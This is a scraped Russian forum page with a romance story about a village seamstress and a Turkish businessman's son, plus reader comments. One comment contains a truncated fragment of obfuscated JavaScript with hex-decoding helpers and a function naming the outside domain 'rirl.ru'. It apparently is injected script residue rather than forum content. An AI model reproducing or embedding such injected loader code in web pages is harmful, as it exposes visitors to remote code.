Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-07 12:12:14 от Гость
Здравствуйте!подскажит е что делать?бросила парня потому что он меня побил... теперь он просит у меня прощения , а я не хочу. Мне страшно . я вижу что он псих. преследует меня . подскажите что делать? ... Подробнее
Последний комментарий
История : Запретный плод-сладок
час назад2016-12-07 16:51:12 от Лёва.
18487нетнетнетнет , ну так понятно что не все так просто. Просто только то - что вы знаете его только с одной стороны. И ваш вывод о "нем, единственном" - с этой точки зрения. имхо. А если вы оба несколько устали после работы, у вас пара детишек требуют внимания к себе, а еще есть у каждого свои ... Все комментарии67597
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Истории о любви
Комедия
пять часов назад2016-12-07 12:41:15
Любовь это безумия
05 декабря в 06:58:47
Любимый брат мужа
04 декабря в 21:17:22
На работу к папе
03 декабря в 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Истории о любви - Ни за что не откажусь. Часть 1
Истории о любви : Ни за что не откажусь. Часть 1     Я простая девушка. Родилась и выросла в деревне. По образованию швея. Никаких заоблачных мечтаний о прекрасной жизни у меня не было, смотрела реально на жизнь в облаках не летала. Работала в городе на швейной фабрике каждый день с одним выходным в неделю, жила себе в маленькой съемной комнатке, ела сосиски с квашенной капустой на ужин и копила на зимние сапоги три месяца в надежде, что их хватит на несколько сезонов и они не развалятся через месяц. Было несколько пробных свиданий с парнями, после которых я сделала вывод, что лучше я буду одна чем с такими никудышными молодыми людьми. В основном попадались любители выпить и срывать звезды с неба при этом не отрывая попу от дивана. Но так было до поездки в Крым.

Я взяла отпуск на две недели и мы с подругой решили съездить в Севастополь на море.
Нам очень повезло снять чистою и просторную комнату у доброжелательной женщины недалеко от пляжа, чему мы были безгранично рады. В первый же день по приезду даже не распаковывая чемоданы мы переоделись и направились к набережной. Погода начала портиться и небо покрывалось черными тучами. Оксана предложила вернутся в дом, но я так хотела увидеть море, искупается в нем, ощутить своим телом омывание волн, на которые я столько лет наблюдала из далека, что в этот миг, меня не могла остановить даже самая страшная и громкая гроза. Друзья! Я впервые увидела море и смогла его пощупать на ощупь. Не судите строго, но я не из богатой семьи, мои родители обыкновенное сельские люди, которые всю жизнь занимались небольшим хозяйством. И поездка на море, это было где-то за пределами моих мечтаний. Так вот, когда мы приблизились к воде я прыгала и кричала от радости, как маленький ребенок, видела взгляды туристов на меня, они наверное думали, что я паяна или сумасшедшая, но мне было все равно. Меня переполняла такая огромная радость, такие яркие чувства, будто я самый счастливый человек на этой планете!.
Небо стало совсем темным от серых туч, усилился ветер и начался сильный ливень, гремел гром, сверкали молнии, люди побежали с пляжа, чтобы укрыться, а я оставалась в воде и наслаждалась, пускай даже ужасающей, но идиллией природы. Я плыла, ныряла, ложилась на волны. И я не заметила, как, ко мне подплыл какой-то парень и взял меня за руку. Он просил меня плыть обратно к берегу, сказал, что сейчас не безопасно находится в воде. Так мы и познакомились))) В море, во время страшной грозы, где была только я и он под открытым небом.
Когда я барахталась в море он сидел в кафе и наблюдал всю эту картину. Как он потом сказал,я начал волноваться за эту чокнутую девушку и побежал её спасать))

Он приехал в Севастополь по бизнесу из Стамбула. В Стамбуле у его отца текстильный бизнес..У них семейная фабрика, где шьют женскую и мужскую линию одежды.
Целых две недели мы с Оксаной каждый день встречались с ним и его другом. Путешествовали по Крыму, посетили множество превосходных мест. Рестораны, дискотеки, пляжи. Я была словно в сказке. О таком парне и о таком внимании, я даже не могла себе позволить мечтать. Прекрасно сложенный, спортивная фигура, смуглая кожа, черные густые волосы и ярко зеленые глаза.
Его мир совершенно не был похож на тот в котором я жила. Передо мной был принц на белом коне из сказки, который привык жить в роскоши и не в чем себе не отказывать и я смотрела на него с открытым ртом и блеском в глазах наивной девушки. Но все прекрасное, когда нибудь заканчивается и в моем случае, это был обратный билет в мою скучную однообразную бедную жизнь в Воронеж.
Я вернулась домой, к своему прежнему образу жизни, все встало на свои места, кроме одного: мое сердце все же было не на месте.
Я думала о нем каждый день, вспоминала каждый миг прожитый с ним, каждое слово, его образ, его добрую манящую улыбку, его губы, глаза и все до мельчайших подробностей. В мыслях я засыпала вместе с ним каждую ночь, я обнимала подушку и представляла, что это он. Я по уши влюбилась в этого красавца и больше ни о чем другом думать не могла. И ждала, что он мне напишет или позвонит и я еще раз смогу его увидеть. Прошло четыре дня и мое сердце чуть не остановилось от волнения, когда я увидела от него смс в фейсбуке. От радости и переполняющих меня эмоций я чуть не сошла с ума. И с того дня мы переписывали и созванивались каждый день. Мы болтали до поздней ночи, не могли уже прожить ни дня, не услышав голоса друг друга. Потом он прилетал в Воронеж, мы ездили ко мне в деревню, я познакомила его с родителями, с друзьями с сестрами. Ему у нас очень понравилось. Потом мы пошли гулять в лес и там у нас случилась первая близость. Это была бешеная страсть, я даже описывать не буду..до сих пор мурашки бегают по коже от воспоминаний этих моментов. Скажу лишь только, что вернулись от туда, когда уже темнело.
Потом мы вместе улетели в Стамбул. И там я увидела совершенно другую жизнь, мир роскоши и гламура, что не появись он в моей жизни, возможно я бы никогда и не побывала там. Каждый день я получала новые эмоции радости и счастья. Для кого то из вас это обыденная жизнь, но для девушки швеи работавшей за десятитысячную зарплату в месяц, это настоящий рай-оказаться в таком месте. На его яхте мы путешествовали в Бодрум, потом от туда в Грецию. Мы занимались любовью до самого рассвета и я все равно не могла насытится им. Он возил меня на свою фабрику, мы ездили по самым красившим местам Стамбула, от куда открывался прекраснейший вид. Он снял для меня красивый небольшой домик с видом на море в центре, недалеко от своего офиса. Мы стали вместе жить. Устроил в Томер-колледж для иностранцев по изучению турецкого языка. Там я нашла себе подруг из Украины и Молдавии. Русский он знал очень хорошо, как и английский. Все у нас было прекрасно, до того момента-пока я не познакомилась с его отцом.
Отцу не пришлась по духу русская невеста и мне пришлось с восточной сказки вернутся в реальную суровую жизнь, которую он мне создал……….
65087
Другие Истории о любви
(9)
Bert
20913 Bert
Bert offline
Репутация : 124710
Комментариев 1181 1
19 июня 02:11:07
2016-06-19 02:11:07

Да, а как всё начиналось красиво, прям как в сказке. Но жизнь не сказка, и заканчиваеться она не всегда хорошо. Думаю, что парень изначально предвидел именно такой конец, а иначе он бы заранее об говорил со своими родителями о вас и принял бы свою настойчивость. Родители смирились бы в итоге.

Ответить
Поддерживаю Да0 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая online
Репутация : 251676
Комментариев 2470 8
19 июня 10:03:48
2016-06-19 10:03:48

Красиво написано, приятно читать. Но история не нова. Турки - очень любвеобильны и умеют ухаживать. Я занимадась мелким бизнессом почти всю жизнь и неоднократно летела за товаром в стамбул, скооперировавшись с коллегами. Так вот многие из моих подруг были влюблены в турков, у которых мы закупали товар. Одна даже ушла от мужа.... Но в итоге осталась одна. так, как умеют пустить пыль в глаза мужчины этой национальности - не умеет никто. А текстильные фабрики, фабрички там у всех)))Шьют свои Дольче-версаче))У меня и сейчас осталась бывшая коллега, которая жила очень долго с турком, который приехал продавать свое барахло здесь( у них тоже семейная фабрика) и жил он с ней до тех пор, пока работал, а потом уехал и женился на своей. А она его до сих пор любит, потому что он подарил ей сказку. Радуйтесь , что он позволил Вам увидеть красоту мира, относитесь и правда как к сказке и пытайтесь адаптироваться к реальности без него.

Ответить
Поддерживаю Да1 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Dевушк@
3954 Dевушк@
Dевушк@ online
Репутация : 235993
Комментариев 1762 1
19 июня 10:54:16
2016-06-19 10:54:16

Интересная история! Когда продолжение?

Ответить
Поддерживаю Да0 / Нет0
Farba
11357 Farba
Farba offline
Репутация : 123226
Комментариев 1521 1
19 июня 11:35:16
2016-06-19 11:35:16

Красивая история о русской Золушке и турецком Принце. Вот только конец хотелось бы счастливый.

Ответить
Поддерживаю Да0 / Нет0
Вера777
21662 Вера777
Вера777 offline
Репутация : 130
Комментариев 3 2
19 июня 11:37:08
2016-06-19 11:37:08

Farba, Дописала конец моей истории. Пока на модерации.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

19 июня 12:57:45
2016-06-19 12:57:45
я не предвидела такой конец.... грустно.... неужели в 21 веке до сих пор настолько чтят традиции, обычаи, что любовь и счастье не имеют места быть???В любом случае, верьте в любовь!!!Она есть. И у Вас будет обязательно!!!
Ответить
Поддерживаю Да0 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1096311
Комментариев 16129 6
19 июня 12:58:11
2016-06-19 12:58:11

Странная_Такая , ой, как точно и как правильно ты подметила на счет подаренной сказки. Всем хочется быть Золушками, всем хочется окунуться в сказку, вот только реальность сурова...

Ответить
Поддерживаю Да0 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Вера777
21662 Вера777
Вера777 offline
Репутация : 130
Комментариев 3 2
19 июня 13:29:00
2016-06-19 13:29:00

Dевушк@, Дописала. Пока на модерации.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да0 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая online
Репутация : 251676
Комментариев 2470 8
20 июня 04:08:56
2016-06-20 04:08:56

Читательница , Это ведь так просто... показать девушке, которая ничего не видела красоты моря, ночного города.... и стать для нее целым миром.... Правда - сказка. а вот как возвращаться потом в реальность? сочувствую автору. Но это не самая печальная история. Это расширит ее кругозор. И на мужчин тоже.

Ответить
Поддерживаю Да0 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке